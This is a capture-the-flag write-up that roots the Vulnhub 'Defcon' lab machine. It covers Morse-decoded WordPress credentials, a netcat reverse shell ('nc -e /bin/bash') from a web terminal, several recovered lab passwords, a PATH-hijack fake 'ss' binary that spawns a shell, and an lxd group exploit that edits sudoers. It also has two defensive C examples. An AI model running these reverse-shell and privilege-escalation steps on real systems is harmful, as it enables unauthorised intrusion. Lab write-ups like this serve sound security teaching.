[VLN] Defcon

Today we are going to hack the Vulnhub machine called Defcon. You can download it from the following link: Defcon



We start with an nmap scan to see which ports are open.

sml@m0nique:~$ nmap -A -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 21:40 CEST
Nmap scan report for
Host is up (0.00096s latency).
Not shown: 65531 filtered ports
22/tcp  open   ssh?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp  open   http     Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Did not follow redirect to https://nsa-server.net
222/tcp closed rsh-spx
443/tcp open   ssl/http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Job Search | Intelligence Careers
| ssl-cert: Subject: commonName=nsa-server/organizationName=National Security 
| Not valid before: 2019-06-10T14:04:18
|_Not valid after:  2019-07-10T14:04:18
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
1 service unrecognized despite returning data. If you know the service/version, 
please submit the following fingerprint at 
https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: nsa-server

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 289.46 seconds
When we browse to the server we are redirected to nsa-server.net, which cannot be resolved... We add nsa-server.net to /etc/hosts. Once it is added, we open http://nsa-server.net. If we inspect the certificate, under "Details -> Issuers" we can see an email address, john@nsa-secretserver.net. We add nsa-secretserver.net to /etc/hosts as well and visit https://nsa-secretserver.net/. If we watch the console "animation" shown on the main page, right at the end we can see:


It looks like Morse code, so let's try to work out what it says. First we remove the "\" character. The "/" character can be kept or replaced with a space. It then looks like this:

- .... . .-- --- .-. -.. .--. .-. . ... ... .--. .- ... ... .-- --- .-. -.. --- 
..-. .--- --- .... -. .. ... ... - .---- .-.. .-.. ...-- .- ... -.-- -.-.-- 
-.-.-- -.-.--
With the "clean" Morse code we go to the following site and translate it: https://morsecode.world/international/translator.html The result is:

If we look closely, it tells us that the credentials to access WordPress are JOHN/ST1LL3ASY!!!. Knowing this, we go to https://nsa-secretserver.net/wp-admin and log in with the credentials we have obtained. We go to: WORDPRESS -> TOOLS -> WPTERM. We have access to a terminal :) We start nc listening on our machine.

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
In the "web" terminal we run:

graham:/var/www/wordpress $ nc -e /bin/bash 5555
And we get the reverse shell.

Graham to John

sml@m0nique:~$ nc -nlvp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 49098
python3 -c 'import pty; pty.spawn("/bin/bash");'
We explore the system a bit, and in the mbox file in graham's home directory we can see the following:

graham@nsa-server:/home/graham$ cat mbox

From john@nsa-server Mon Jun 10 11:35:48 2019
Envelope-to: graham@nsa-server
Delivery-date: Mon, 10 Jun 2019 11:35:48 +0200
Received: from john by nsa-server with local (Exim 4.89)
        (envelope-from )
        id 1haGiS-0004Sh-6R
        for graham@nsa-server; Mon, 10 Jun 2019 11:35:48 +0200
Subject: password problems
X-Mailer: mail (GNU Mailutils 3.1.1)
From: john@nsa-server
Date: Mon, 10 Jun 2019 11:35:48 +0200

Hi Graham,

Sorry man to bother you, but I forgot my password.
I don't want to go to Smith because he will rip me a new hole.
Can you please help me?

Thanks man!!!

It seems that "john" has forgotten his password. We keep investigating the system and look at the .viminfo file.

graham:/home/graham $ cat .viminfo
# This viminfo file was generated by Vim 8.0.
# You may edit it if you're careful!

# Debug Line History (newest to oldest):

# Registers:
""1	LINE	0
	export SSLKEYLOGFILE=/home/graham/master.log
|3,1,1,1,1,0,1557842873,"export SSLKEYLOGFILE=/home/graham/master.log"

# File marks:
'0  20  0  ~/.local/share/Trash/files/note.txt
Apparently he has been editing the file note.txt. Let's check it.

graham@nsa-server:/home/graham$ cat ~/.local/share/Trash/files/note.txt
cat ~/.local/share/Trash/files/note.txt
Hi John,

After your latest password failure I changed it. You know where it is right? 
Wink Wink!
Pretty easy right? Try not to forget this one also.
You know how the boss is like! You wanna get fired or something?

Also smart idea to sent this message with netcat right?
I don't trust our mailsystem.
After sending this message, I'll trow it away....no one will know.

hahahaha......now who is a cybernoob!!!!



P.S. You Do kNow whEre The paSswoRd Is hiDden rigHt?
After reading the message carefully, we see that john's password is the uppercase letters that appear in the P.S., so john's password is YDNETSRIDH. With these credentials, we switch to the user john.

graham@nsa-server:/home/graham$ su john
Let's check whether john can run anything with sudo.

john@nsa-server:~$ sudo -l
sudo -l
Matching Defaults entries for john on nsa-server:
    env_reset, mail_badpass,

User john may run the following commands on nsa-server:
    (ALL) PASSWD: /bin/systemctl start ssh, /bin/systemctl stop ssh,
        /bin/systemctl status ssh
We can start ssh, so we start it :)

john@nsa-server:~$ sudo /bin/systemctl start ssh
Let's see which port it runs on.

john@nsa-server:~$ netstat -ntlp
netstat -ntlp                                                                   
(Not all processes could be identified, non-owned process info                  
 will not be shown, you would have to be root to see it all.)                   
Active Internet connections (only servers)                                      
Proto Recv-Q Send-Q Local Address           Foreign Address         State       
PID/Program name                                                                
tcp        0      0*               LISTEN      
tcp        0      0    *               LISTEN      
tcp        0      0*               LISTEN      
tcp        0      0    *               LISTEN      
tcp        0      0  *               LISTEN      
tcp        0      0   *               LISTEN      
tcp        0      0   *               LISTEN      
We see that it runs on port 222, so we log in as john using ssh.

John to George

sml@m0nique:~$ ssh john@ -p 222
john@'s password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
No mail.
Last login: Wed Apr 22 13:16:25 2020 from
After exploring the system as john, we find a curious file in /home/john/Documents called secret.png. We copy it to our machine.

sml@m0nique:~$ scp -P 222 john@ .
Let's check what type of file it is.

sml@m0nique:~$ file secret.png
secret.png: PDF document, version \012.\012
The extension is .png; however, the "file" command tells us it is a PDF document. We open the file with GHex and change the header to 89 50 4E 47 0D 0A 1A 0A, i.e. the header of a PNG. Once the header is changed, we save and can open the file as an image. We see that the password is: 2W3dsF5tGh-Kl#1. After trying it against the system users, the password belongs to the user george. We connect as george...
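The same repair done with GHex above, as an added example that is not part of the original write-up: it checks whether the bytes after the 8-byte header still form a PNG IHDR chunk (length 13 followed by "IHDR"), and only then overwrites the foreign header with the PNG signature. The sample buffer in demo_constructed_sample() is constructed here to stand in for secret.png, using a "%PDF-" style header that `file` would report as "PDF document, version \012.\012".

```c
#include <stdio.h>
#include <string.h>

static const unsigned char PNG_SIG[8] = {0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A};

/* 1 if the first 8 bytes are the PNG signature. */
int has_png_signature(const unsigned char *buf, size_t len) {
    return len >= 8 && memcmp(buf, PNG_SIG, 8) == 0;
}

/* 1 if bytes 8..15 are the start of an IHDR chunk (length 13 + "IHDR"),
 * which is what a PNG body looks like no matter what the header says. */
int has_png_ihdr(const unsigned char *buf, size_t len) {
    static const unsigned char ihdr[8] = {0, 0, 0, 13, 'I', 'H', 'D', 'R'};
    return len >= 16 && memcmp(buf + 8, ihdr, 8) == 0;
}

/* Returns 1 if the signature was restored, 0 if the file already was a PNG,
 * -1 if the body does not look like a PNG (the buffer is left untouched). */
int restore_png_signature(unsigned char *buf, size_t len) {
    if (!has_png_ihdr(buf, len)) return -1;
    if (has_png_signature(buf, len)) return 0;
    memcpy(buf, PNG_SIG, 8);
    return 1;
}

/* Constructed sample: a PNG body behind a "%PDF-\n.\n" header.  Returns 1 if
 * the repair succeeds and the buffer then carries a valid PNG signature. */
int demo_constructed_sample(void) {
    unsigned char buf[16] = {'%', 'P', 'D', 'F', '-', '\n', '.', '\n',
                             0, 0, 0, 13, 'I', 'H', 'D', 'R'};
    return restore_png_signature(buf, sizeof buf) == 1 && has_png_signature(buf, sizeof buf);
}

int main(int argc, char **argv) {
    static unsigned char buf[1 << 24];             /* files up to 16 MiB */
    if (argc != 3) { fprintf(stderr, "usage: %s in out\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 1; }
    size_t n = fread(buf, 1, sizeof buf, f);
    fclose(f);
    int r = restore_png_signature(buf, n);
    if (r < 0) { fprintf(stderr, "%s: body is not a PNG\n", argv[1]); return 1; }
    printf("%s\n", r ? "signature restored" : "already a PNG");
    if (!(f = fopen(argv[2], "wb"))) { perror(argv[2]); return 1; }
    fwrite(buf, 1, n, f);
    fclose(f);
    return 0;
}
```

Run it as `./fixpng secret.png secret-fixed.png`; a file whose body is not a PNG is reported and left alone, so a genuine PDF is never corrupted.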

George to Samantha

sml@m0nique:~$ ssh george@ -p 222
george@'s password: 
Linux nsa-server 4.9.0-9-amd64 #1 SMP Debian 4.9.168-1+deb9u2 (2019-05-13) 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr 22 13:56:10 2020 from
Let's see what george can do with sudo.

george@nsa-server:~$ sudo -l
[sudo] password for george:                                                     
Matching Defaults entries for george on nsa-server:                             
 env_reset, mail_badpass, 
User george may run the following commands on nsa-server:                                                                                                        
    (samantha) /usr/bin/vi                                                                                                                                        
We see that he can run vi as samantha. Let's do it.

george@nsa-server:~$ sudo -u samantha /usr/bin/vi
And to get a shell as samantha from inside vi:


Samantha to Nicky

In samantha's home we can see an interesting file, check.

samantha@nsa-server:~$ cd /home/samantha
samantha@nsa-server:~$ ls -l                                                                                                                                    
total 60                                                                           
-rwsr-xr-x 1 root     root     8792 Apr 10 16:17 check   
When we run it, we see that it prints the output of the "ss" command.

samantha@nsa-server:~$ strings check
ss -tupan
Looking at the strings output, we see that it does not use the full path to run ss... Knowing this, we are going to use an "ss" that gives us a shell. First, we add the current directory to the PATH variable so that the fake "ss" is found before the real one.

samantha@nsa-server:~$ export PATH=.:$PATH
samantha@nsa-server:~$ echo $PATH
On our machine we prepare the "fake" ss.

samantha@nsa-server:~$ cat ss.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */

int main(void)
{
    /* Fake "ss" picked up through PATH by the setuid "check" binary:
       keep the ids check runs with and drop into a shell. */
    setuid(0); setgid(0); system("/bin/bash");
    return 0;
}
samantha@nsa-server:~$ gcc -o ss ss.c
ss.c: In function ‘main’:
ss.c:7:1: warning: implicit declaration of function ‘system’ 
We compile it and give it the right permissions.

samantha@nsa-server:~$ chmod u+s ss
samantha@nsa-server:~$ chmod +x ss
Finally, we run it!

samantha@nsa-server:~$ ./check
[-] These are all the connections at the moment:

bash-4.4$ id
uid=1007(nicky) gid=1007(nicky) groups=1007(nicky),1006(samantha)
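The hardened shape of a helper like "check", as an added example that is not code from the machine: path_is_hijackable() flags a PATH with a relative, empty or "." entry (the condition the export above created), and run_ss_tupan() runs ss by absolute path with a fixed environment instead of system("ss -tupan"), so the caller's PATH is never consulted. The absolute path /usr/bin/ss is an assumption for a Debian host.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* 1 if any PATH entry is relative, empty or ".", i.e. a command resolved
 * through PATH could be a file the caller controls. */
int path_is_hijackable(const char *path_env) {
    const char *p = path_env;
    for (;;) {
        const char *colon = strchr(p, ':');
        size_t n = colon ? (size_t)(colon - p) : strlen(p);
        if (n == 0 || p[0] != '/') return 1;   /* "", "." or "bin/..." */
        if (!colon) return 0;
        p = colon + 1;
    }
}

/* Run ss with a fixed absolute path and a fixed environment (assumed
 * location /usr/bin/ss).  Returns ss's exit status, -1 on fork/exec failure. */
int run_ss_tupan(void) {
    char *const argv[] = {"/usr/bin/ss", "-tupan", NULL};
    char *const envp[] = {"PATH=/usr/bin:/bin", NULL};
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execve("/usr/bin/ss", argv, envp);   /* only returns on failure */
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    const char *path = getenv("PATH");
    if (path && path_is_hijackable(path))
        fprintf(stderr, "[!] caller's PATH has a relative entry: %s\n", path);
    printf("[-] These are all the connections at the moment:\n");
    return run_ss_tupan() == 0 ? 0 : 1;
}
```

A helper like this also does not need the setuid bit at all for ss -tupan; leaving it off removes the privilege boundary that made the hijack worth doing.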

Nicky to Root

OK, now that we are "nicky" we explore the system.

bash-4.4$ cd /home/nicky/Documents
bash-4.4$ ls -la
total 12
drwxr-xr-x  2 nicky nicky 4096 Apr 22 14:54 .
drwxr-x--- 10 nicky nicky 4096 Apr 10 17:01 ..
-rw-r--r--  1 nicky nicky   14 Apr 22 14:54 .passwd
bash-4.4$ cat .passwd
It looks like we have found her password :) We use it to connect via ssh as nicky.

sml@m0nique:~$ ssh nicky@ -p 222
nicky@'s password: 
Let's see whether nicky can connect to mysql.

nicky@nsa-server:~$ mysql -u nicky -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 45
Server version: 10.1.38-MariaDB-0+deb9u1 Debian 9.8
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> 
We are inside mysql :) Let's explore the databases.

MariaDB [(none)]> show databases;
| Database           |
| information_schema |
| mysql              |
| performance_schema |
| wordpress          |
4 rows in set (0.01 sec)
We select the mysql database.

MariaDB [(none)]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
Let's see which tables there are.

MariaDB [mysql]> show tables;
| Tables_in_mysql           |
| column_stats              |
| columns_priv              |
| db                        |
| event                     |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| host                      |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| plugin                    |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
| user                      |
30 rows in set (0.00 sec)
There is an interesting table called user. Let's take a look at it.

MariaDB [mysql]> select * from user;
| Host      | User    | Password  
| localhost | admin   | *6B6D111D0EC8D42C2955E082DD087C3E56B17F98 |
| %         | smith   | *BE84A0E22A8E3E1EAA0883956B3F8692DFE4CA13 |
| localhost | nicky   | *75961C95665DC2BAC3F947AF4C60FD73564BCFE2 | 
5 rows in set (0.00 sec)
We see that the user smith appears... We search for the hash/password on Google... It leads us to: https://twitter.com/onlinehashcrack/status/287432972456562689 where we can see that the password is: abygurl69. We log in as the user smith. We see that smith is in the lxc group. We look for the "lxc" executable and add its path to our $PATH variable.

smith@nsa-server:~$ whereis lxc
smith@nsa-server:~$ clear
smith@nsa-server:~$ find / -name lxc 2>/dev/null
smith@nsa-server:~$ export PATH=/snap/bin:$PATH
In /home/smith we see a shell script called lxd-exploit which might work... Running it without parameters tells us that it needs the name of the container...

smith@nsa-server:~$ sh lxd-exploit.sh 
The exploit currently requires an existing container.
Let's list the names of the existing containers.

smith@nsa-server:~$ lxc list
|  NAME   |  STATE  | IPV4 | IPV6 |    TYPE    | SNAPSHOTS |
| nsa-lab | STOPPED |      |      | PERSISTENT |           |
We see that there is a container called nsa-lab. Knowing that the container name is nsa-lab, we run the exploit.

smith@nsa-server:~$ sh lxd-exploit.sh nsa-lab
[+] Stopping container nsa-lab
Error: The container is already stopped
[+] Setting container security privilege on
[+] Starting container nsa-lab
[+] Mounting host root filesystem to nsa-lab
Device rootdisk added to nsa-lab
[+] Using container to add smith to /etc/sudoers
[+] Unmounting host root filesystem from nsa-lab
Device rootdisk removed from nsa-lab
[+] Resetting container security privilege to off
[+] Stopping the container
[+] Done! Enjoy your sudo superpowers!
Let's enjoy our sudo superpowers!

Privilege Escalation

smith@nsa-server:~$ sudo su
And now as root, we finish exploring...


root@nsa-server:~# ls
clean.sh  Documents  endlessh  names     Public    snap       thinclient_drives
Desktop   Downloads  Music     Pictures  root.txt  Templates  Videos
root@nsa-server:~# cat root.txt




And with this we are root on the machine :)